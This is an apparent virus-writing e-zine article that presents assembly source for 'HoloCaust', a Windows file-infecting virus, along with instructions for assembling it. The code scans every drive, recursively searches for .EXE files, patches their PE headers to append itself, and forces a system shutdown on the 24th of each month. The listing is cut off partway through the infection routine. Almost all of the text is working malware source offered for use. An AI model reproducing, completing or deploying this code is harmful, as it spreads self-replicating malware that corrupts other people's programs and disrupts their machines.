The Revoluti0n
| last article | table of contents | next article |
|---|
| last article | table of contents | next article |
|---|
HoloCaust by Energy
file holocaust.asm:
;Virus Name: HoloCaust
;Designer: Energy
;E-mail:SST@Hablas.com
;
;beta Version 1.12
;
;To Make file HoloCaust.asm
;Turbo Assembler:tasm /m /m3 holocaust.asm
;Turbo Link:tlink /3 /t holocaust.obj
;-------------------------------------------------------------------------------------------
.386P
NULL=0h
OPEN_EXISTING=3h
GENERIC_READ=80000000h
GENERIC_WRITE=40000000h
FILE_BEGIN=0h
FILE_CURRENT=1h
FILE_END=2h
e_ifanew=03ch
FILE_ATTRIBUTE_ARCHIVE=20h
FILE_ATTRIBUTE_DIRECTORY=10h
CODE SEGMENT
ASSUME CS:CODE,DS:CODE
ORG 100H
Start:
A00000000: DB
04DH,05AH,090H,000H,003H,000H,000H,000H,004H,000H,000H,000H,0FFH,0FFH,000H,000H
A00000010: DB
0B8H,000H,000H,000H,000H,000H,000H,000H,040H,000H,000H,000H,000H,000H,000H,000H
A00000020: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000030: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,0B0H,000H,000H,000H
A00000040: DB 00EH,01FH,0BAH,00EH,000H,0B4H,009H,0CDH,021H,0B8H,001H,04CH,0CDH,021H,"(" ,"c"
A00000050: DB ")" ," " ,"b" ,"y" ," " ,"E" ,"n" ,"e" ,"r" ,"g" ,"y"
A00000080: DB
05DH,017H,01DH,0DBH,019H,076H,073H,088H,019H,076H,073H,088H,019H,076H,073H,088H
A00000090: DB
019H,076H,073H,088H,01EH,076H,073H,088H,0E5H,056H,061H,088H,018H,076H,073H,088H
A000000A0: DB
052H,069H,063H,068H,019H,076H,073H,088H,000H,000H,000H,000H,000H,000H,000H,049H
A000000B0: DB
050H,045H,000H,000H,04CH,001H,004H,000H,0BAH,063H,03DH,037H,000H,000H,000H,000H
A000000C0: DB
000H,000H,000H,000H,0E0H,000H,00FH,001H,00BH,001H,005H,00CH,000H,002H,000H,000H
A000000D0: DB
000H,004H,000H,000H,000H,000H,000H,000H,000H,040H,000H,000H,000H,010H,000H,000H
A000000E0: DB
000H,020H,000H,000H,000H,000H,040H,000H,000H,010H,000H,000H,000H,002H,000H,000H
A000000F0: DB
004H,000H,000H,000H,000H,000H,000H,000H,004H,000H,000H,000H,000H,000H,000H,000H
A00000100: DB
000H,040H,000H,000H,000H,004H,000H,000H,000H,000H,000H,000H,002H,000H,000H,000H
A00000110: DB
000H,000H,010H,000H,000H,010H,000H,000H,000H,000H,010H,000H,000H,010H,000H,000H
A00000120: DB
000H,000H,000H,000H,010H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000130: DD New_Imoprt_Descridtor-Virus_Code+4000H
DB
03CH,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000140: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000150: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000160: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000170: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000180: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,020H,000H,000H,010H,000H,000H,000H
A00000190: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A000001A0: DB
000H,000H,000H,000H,000H,000H,000H,000H,02EH,074H,065H,078H,074H,000H,000H,000H
A000001B0: DB
026H,000H,000H,000H,000H,010H,000H,000H,000H,002H,000H,000H,000H,004H,000H,000H
A000001C0: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,020H,000H,000H,060H
A000001D0: DB
02EH,072H,064H,061H,074H,061H,000H,000H,092H,000H,000H,000H,000H,020H,000H,000H
A000001E0: DB
000H,002H,000H,000H,000H,006H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A000001F0: DB
000H,000H,000H,000H,040H,000H,000H,040H,02EH,064H,061H,074H,061H,000H,000H,000H
A00000200: DB
032H,000H,000H,000H,000H,030H,000H,000H,000H,002H,000H,000H,000H,008H,000H,000H
A00000210: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,040H,000H,000H,0C0H
A00000220: DB 02EH,"H", "o" ,"l" ,"o" ,"c" ,"a" ,"u" ,"s" ,"t"
,02EH,02EH,02EH,02EH,000H,010H,000H,000H,000H,040H,000H,000H
A00000230: DB
000H,010H,000H,000H,000H,00AH,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000240: DB
000H,000H,000H,000H,020H,000H,000H,060H,000H,000H,000H,000H,000H,000H,000H,000H
A00000250: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000260: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000270: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000280: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000290: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A000002A0: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A000002B0: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A000002C0: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A000002D0: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A000002E0: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A000002F0: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000300: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000310: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000320: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000330: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000340: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000350: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000360: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000370: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000380: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000390: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A000003A0: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A000003B0: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A000003C0: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A000003D0: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A000003E0: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A000003F0: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000400: DB
06AH,000H,068H,000H,030H,040H,000H,068H,019H,030H,040H,000H,06AH,000H,0E8H,00DH
A00000410: DB
000H,000H,000H,06AH,000H,0E8H,000H,000H,000H,000H,0FFH,025H,000H,020H,040H,000H
A00000420: DB
0FFH,025H,008H,020H,040H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000430: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000440: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000450: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000460: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000470: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000480: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000490: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A000004A0: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A000004B0: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A000004C0: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A000004D0: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A000004E0: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A000004F0: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000500: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000510: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000520: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000530: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000540: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000550: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000560: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000570: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000580: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000590: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A000005A0: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A000005B0: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A000005C0: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A000005D0: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A000005E0: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A000005F0: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000600: DB
05CH,020H,000H,000H,000H,000H,000H,000H,078H,020H,000H,000H,000H,000H,000H,000H
A00000610: DB
04CH,020H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,06AH,020H,000H,000H
A00000620: DB
000H,020H,000H,000H,054H,020H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000630: DB
086H,020H,000H,000H,008H,020H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000640: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,05CH,020H,000H,000H
A00000650: DB
000H,000H,000H,000H,078H,020H,000H,000H,000H,000H,000H,000H,075H,000H,045H,078H
A00000660: DB
069H,074H,050H,072H,06FH,063H,065H,073H,073H,000H,04BH,045H,052H,04EH,045H,04CH
A00000670: DB
033H,032H,02EH,064H,06CH,06CH,000H,000H,0BBH,001H,04DH,065H,073H,073H,061H,067H
A00000680: DB
065H,042H,06FH,078H,041H,000H,055H,053H,045H,052H,033H,032H,02EH,064H,06CH,06CH
A00000690: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A000006A0: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A000006B0: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A000006C0: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A000006D0: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A000006E0: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A000006F0: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000700: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000710: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000720: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000730: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000740: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000750: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000760: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000770: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000780: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000790: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A000007A0: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A000007B0: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A000007C0: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A000007D0: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A000007E0: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A000007F0: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000800: DB "T" ,"h" ,"i" ,"s" ," " ,"i" ,"s" ," " ,"a" ," " ,"b" ,"e" ,"t" ,"a" ," " ,"v"
A00000810: DB "i" ,"r" ,"u" ,"s" ,"!" ,"!" ,"!" ,"!" ,000H,"T" ,"h" ,"a" ,"n" ,"k" ," " ,"y"
A00000820: DB "o" ,"u" ,"!" ,"!" ," " ," " ,"(" ,"c" ,")" ," " ,"E" ,"n" ,"e" ,"r" ,"g" ,"y"
A00000830: DB " " ,"!"
,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000840: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000850: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000860: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000870: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000880: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000890: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A000008A0: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A000008B0: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A000008C0: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A000008D0: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A000008E0: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A000008F0: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000900: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000910: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000920: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000930: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000940: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000950: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000960: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000970: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000980: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000990: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A000009A0: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A000009B0: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A000009C0: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A000009D0: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A000009E0: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A000009F0: DB
000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
A00000A00:
Virus_Code=$;Virus start here
call Relocation
InfectFileName=$
Driver db "b"
db 260 dup (0)
Relocation:
pop ebp
sub ebp,5
mov eax,[ImageBase-Virus_Code+ebp]
add eax,[AddressOfEnterPoint-Virus_Code+ebp]
mov [This_Host_EntryPoint-Virus_Code+ebp],eax
call dword ptr [GetLogicalDrives-Virus_Code+ebp]
mov ecx,32;eax is 32 bit
mov edx,0
Count_Driver:
mov ebx,eax
and ebx,1b
add edx,ebx
rcr eax,1
loop Count_Driver
sub edx,2
mov ecx,edx
mov byte ptr [Driver-Virus_Code+ebp],"b"
start at c:(b+1)
Next_Driver:
add byte ptr [Driver-Virus_Code+ebp],1
lea ebx,[InfectFileName-Virus_Code+ebp]
mov eax,002a5c3ah
mov [ebx+1],eax
add ebx,3
push edx
push ecx
mov [Save_esp-Virus_Code+ebp],esp
call Infect_This_Driver
We_Had_Infect_One:
mov esp,[Save_esp-Virus_Code+ebp]
pop ecx
pop edx
loop Next_Driver
lea eax,[SystemTime-Virus_Code+ebp]
push eax
call dword ptr [GetSystemTime-Virus_Code+ebp]
cmp word ptr [wDay-Virus_Code+ebp],24
jnz Jmp_To_Host
push 0
push 4
call dword ptr [ExitWindowsEx-Virus_Code+ebp]
push 0
call dword ptr [ExitProcess-Virus_Code+ebp]
Jmp_To_Host:
mov eax,[This_Host_EntryPoint-Virus_Code+ebp]
PUSH eax
RET
This_Host_EntryPoint dd ?
Save_Espdd ?
Infect_This_Driver proc
call Enter_FindAndInfect
ret
Infect_This_Driver endp
Enter_FindAndInfect proc
lea eax,[Virus_WIN32_FIND_DATA-Virus_Code+ebp]
push eax
lea eax,[InfectFileName-Virus_Code+ebp]
push eax
call dword ptr [FindFirstFileA-Virus_Code+ebp]
push eax
cmp eax,0ffffffffh
jz Find_Exit
next:
push ebx
cmp byte ptr [cFileName-Virus_Code+ebp],"."
jz Management_OK
lea ecx,[cFileName-Virus_Code+ebp]
Again:
mov dl,[ecx]
mov [ebx],dl
add ecx,1
add ebx,1
cmp dl,0
jnz Again
cmp dword ptr [dwFileAttributes-Virus_Code+ebp],FILE_ATTRIBUTE_DIRECTORY
jnz IsAFile
mov eax,"*.*\"
mov [ebx-1],eax
mov [ebx+3],byte ptr 0
call Enter_FindAndInfect
jmp Management_OK
ISAfile:
cmp dword ptr [ebx-5],"EXE."
jz Is_A_EXE_File
cmp dword ptr [ebx-5],"exe."
jz Is_A_EXE_File
jmp Management_OK
Is_A_EXE_file:
call Infect_File
cmp eax,012345678h
Infect_File
jz We_Had_Infect_One
recursion
Management_OK:
pop ebx
pop ecx
push ecx
lea eax,[Virus_WIN32_FIND_DATA-Virus_Code+ebp]
push eax
push ecx
call dword ptr [FindNextFileA-Virus_Code+ebp]
cmp eax,0
jnz next
Find_Exit:
pop eax
ret
Enter_FindAndInfect endp
Infect_File proc near
push FILE_ATTRIBUTE_ARCHIVE
lea eax,[InfectFileName-Virus_Code+ebp]
push eax
call dword ptr [SetFileAttributesA-Virus_Code+ebp]
push NULL
push NULL
push OPEN_EXISTING
push 0
push 0
push GENERIC_READ+GENERIC_WRITE
lea eax,[InfectFileName-Virus_Code+ebp]
push eax
call dword ptr [CreateFileA-Virus_Code+ebp]
cmp eax,0ffffffffh
jz InfectFile_Exit
mov [HandleFile-Virus_Code+ebp],eax
push FILE_BEGIN
push 0
push e_ifanew
push dword ptr [HandleFile-Virus_Code+ebp]
call dword ptr [SetFilePointer-Virus_Code+ebp]
push NULL
lea eax,[DoWriteOrRead-Virus_Code+ebp]
push eax
push 4
lea eax,[NT_Header-Virus_Code+ebp]
push eax
push dword ptr [HandleFile-Virus_Code+ebp]
call dword ptr [ReadFile-Virus_Code+ebp]
mov eax,[NT_Header-Virus_Code+ebp]
sub eax,1
push FILE_BEGIN
push 0
push eax
push dword ptr [HandleFile-Virus_Code+ebp]
call dword ptr [SetFilePointer-Virus_Code+ebp]
push NULL
lea eax,[DoWriteOrRead-Virus_Code+ebp]
push eax
push 4
lea eax,[PE_Signature-Virus_Code+ebp]
push eax
push dword ptr [HandleFile-Virus_Code+ebp]
call dword ptr [ReadFile-Virus_Code+ebp]
cmp dword ptr [PE_Signature-Virus_Code+ebp],00455000h
jnz InfectFile_Exit
mov eax,[NT_Header-Virus_Code+ebp]
add eax,6
mov [Point_NumberOfSection-Virus_Code+ebp],eax
push FILE_BEGIN
push 0
push dword ptr [Point_NumberOfSection-Virus_Code+ebp]
push dword ptr [HandleFile-Virus_Code+ebp]
call dword ptr [SetFilePointer-Virus_Code+ebp]
push NULL
lea eax,[DoWriteOrRead-Virus_Code+ebp]
push eax
push 2
lea eax,[NumberOfSection-Virus_Code+ebp]
push eax
push dword ptr [HandleFile-Virus_Code+ebp]
call dword ptr [ReadFile-Virus_Code+ebp]
mov eax,[NT_Header-Virus_Code+ebp]
add eax,20
mov [Point_SizeOfOptionalHeader-Virus_Code+ebp],eax
push FILE_BEGIN
push 0
push dword ptr [Point_SizeOfOptionalHeader-Virus_Code+ebp]
push dword ptr [HandleFile-Virus_Code+ebp]
call dword ptr [SetFilePointer-Virus_Code+ebp]
push NULL
lea eax,[DoWriteOrRead-Virus_Code+ebp]
push eax
push 2
lea eax,[SizeOfOptionalHeader-Virus_Code+ebp]
push eax
push dword ptr [HandleFile-Virus_Code+ebp]
call dword ptr [ReadFile-Virus_Code+ebp]
mov eax,[NT_Header-Virus_Code+ebp]
add eax,40
mov [Point_AddressOfEnterPoint-Virus_Code+ebp],eax
push FILE_BEGIN
push 0
push dword ptr [Point_AddressOfEnterPoint-Virus_Code+ebp]
push dword ptr [HandleFile-Virus_Code+ebp]
call dword ptr [SetFilePointer-Virus_Code+ebp]
push NULL
lea eax,[DoWriteOrRead-Virus_Code+ebp]
push eax
push 4
lea eax,[AddressOfEnterPoint-Virus_Code+ebp]
push eax
push dword ptr [HandleFile-Virus_Code+ebp]
call dword ptr [ReadFile-Virus_Code+ebp]
mov eax,[NT_Header-Virus_Code+ebp]
add eax,52
mov [Point_ImageBase-Virus_Code+ebp],eax
push FILE_BEGIN
push 0
push dword ptr [Point_ImageBase-Virus_Code+ebp]
push dword ptr [HandleFile-Virus_Code+ebp]
call dword ptr [SetFilePointer-Virus_Code+ebp]
push NULL
lea eax,[DoWriteOrRead-Virus_Code+ebp]
push eax
push 4
lea eax,[ImageBase-Virus_Code+ebp]
push eax
push dword ptr [HandleFile-Virus_Code+ebp]
call dword ptr [ReadFile-Virus_Code+ebp]
mov eax,[NT_Header-Virus_Code+ebp]
add eax,80
mov [Point_SizeOfImage-Virus_Code+ebp],eax
push FILE_BEGIN
push 0
push dword ptr [Point_SizeOfImage-Virus_Code+ebp]
push dword ptr [HandleFile-Virus_Code+ebp]
call dword ptr [SetFilePointer-Virus_Code+ebp]
push NULL
lea eax,[DoWriteOrRead-Virus_Code+ebp]
push eax
push 4
lea eax,[SizeOfImage-Virus_Code+ebp]
push eax
push dword ptr [HandleFile-Virus_Code+ebp]
call dword ptr [ReadFile-Virus_Code+ebp]
mov eax,[NT_Header-Virus_Code+ebp]
add eax,128
mov [Point_ImportTable-Virus_Code+ebp],eax
push FILE_BEGIN
push 0
push dword ptr [Point_ImportTable-Virus_Code+ebp]
push dword ptr [HandleFile-Virus_Code+ebp]
call dword ptr [SetFilePointer-Virus_Code+ebp]
push NULL
lea eax,[DoWriteOrRead-Virus_Code+ebp]
push eax
push 4
lea eax,[ImportTable-Virus_Code+ebp]
push eax
push dword ptr [HandleFile-Virus_Code+ebp]
call dword ptr [ReadFile-Virus_Code+ebp]
mov eax,[SizeOfImage-Virus_Code+ebp]
mov [SVirtualAddress-Virus_Code+ebp],eax
push FILE_END
push 0
push 0
push dword ptr [HandleFile-Virus_Code+ebp]
call dword ptr [SetFilePointer-Virus_Code+ebp]
add eax,200h-1h
and eax,011111111111111111111111000000000b
mov [PointerToRawData-Virus_Code+ebp],eax
mov ebx,0
mov bx,[SizeOfOptionalHeader-Virus_Code+ebp]
add ebx,[NT_Header-Virus_Code+ebp]
add ebx,24;PE header size
mov eax,0
mov ax,[NumberOfSection-Virus_Code+ebp]
mov ecx,40
mul ecx
add eax,ebx
mov [Point_AEmptySectionTable-Virus_Code+ebp],eax
FindAgain:
push FILE_BEGIN
push 0
push ebx;ebx->Section Header start
push dword ptr [HandleFile-Virus_Code+ebp]
call dword ptr [SetFilePointer-Virus_Code+ebp]
add ebx,40
push NULL
lea eax,[DoWriteOrRead-Virus_Code+ebp]
push eax
push 24;read 24 byte
lea eax,[HostSectionTable-Virus_Code+ebp]
push eax
push dword ptr [HandleFile-Virus_Code+ebp]
call dword ptr [ReadFile-Virus_Code+ebp]
mov eax,[ImportTable-Virus_Code+ebp]
sub eax,[HostSVirtualAddress-Virus_Code+ebp]
cmp eax,[HostSVirtualSize-Virus_Code+ebp]
jnb FindAgain;NoInThisSection
add eax,[HostPointerToRawData-Virus_Code+ebp]
mov [Point_FileOffsetImportTable-Virus_Code+ebp],eax
jmp WeGotIt
HostSectionTable=$
HostNameSectiondb 8 dup(?)
HostSVirtualSize dd ?
HostSVirtualAddressdd ?
HostSizeOfRawData dd ?
HostPointerToRawDatadd ?
WeGotIt:
mov ecx,24
lea esi,[Fix_Data-Virus_Code+ebp]
lea edi,[Move_Data-Virus_Code+ebp]
mov ebx,[SizeOfImage-Virus_Code+ebp]
Move_Add_Again:
mov eax,[esi]
add eax,ebx
mov [edi],eax
add esi,4
add edi,4
loop Move_Add_Again
mov dword ptr [Zero_KERNEL32-Virus_Code+ebp],0
mov dword ptr [Zero_USER32-Virus_Code+ebp],0
push FILE_BEGIN
push 0
push dword ptr [Point_FileOffsetImportTable-Virus_Code+ebp]
push dword ptr [HandleFile-Virus_Code+ebp]
call dword ptr [SetFilePointer-Virus_Code+ebp]
push NULL
lea eax,[DoWriteOrRead-Virus_Code+ebp]
push eax
push 600;30 DLL
lea eax,[HostImportData-Virus_Code+ebp]
push eax
push dword ptr [HandleFile-Virus_Code+ebp]
call dword ptr [ReadFile-Virus_Code+ebp]
mov ax,[NumberOfSection-Virus_Code+ebp]
add ax,1
mov [Infected_NumberOfSection-Virus_Code+ebp],ax
push FILE_BEGIN
push 0
push dword ptr [Point_NumberOfSection-Virus_Code+ebp]
push dword ptr [HandleFile-Virus_Code+ebp]
call dword ptr [SetFilePointer-Virus_Code+ebp]
push NULL
lea eax,[DoWriteOrRead-Virus_Code+ebp]
push eax
push 2
lea eax,[Infected_NumberOfSection-Virus_Code+ebp]
push eax
push dword ptr [HandleFile-Virus_Code+ebp]
call dword ptr [WriteFile-Virus_Code+ebp]
mov eax,[SizeOfImage-Virus_Code+ebp]
mov [Infected_AddressOfEnterPoint-Virus_Code+ebp],eax
push FILE_BEGIN
push 0
push dword ptr [Point_AddressOfEnterPoint-Virus_Code+ebp]
push dword ptr [HandleFile-Virus_Code+ebp]
